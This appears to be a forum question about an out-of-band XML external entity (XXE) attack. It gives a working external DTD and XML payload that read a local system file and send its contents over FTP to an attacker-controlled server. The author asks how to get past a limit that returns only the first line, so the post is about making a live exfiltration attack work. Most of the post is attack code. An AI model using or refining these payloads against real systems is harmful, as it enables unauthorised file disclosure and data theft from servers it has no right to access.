# XXE OOB File Content Extraction

Tags: exploit, xml, xxe

Currently, I've discovered an OOB XXE that allows me to include a `.dtd` file to extract a particular system file content, for instance, `/sys/power/disk`.

So my `file.dtd` is:

```
<!ENTITY % data SYSTEM "file:///sys/power/disk">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://MY_SERVER/%data;'>">
```

And the web payload is:

```
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://SERVER/file.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
```

I mounted the FTP server and all is working. The issue is that even when the payload works, the server returns only the first line of the indicated file. I thought maybe encoding the file content it can be included by the parser.

Comment: Maybe this is useful for you: https://stackoverflow.com/questions/58395997/xxe-unable-to-retrieve-files-with-multiple-lines , looks like newer versions of java don't allow multiple lines.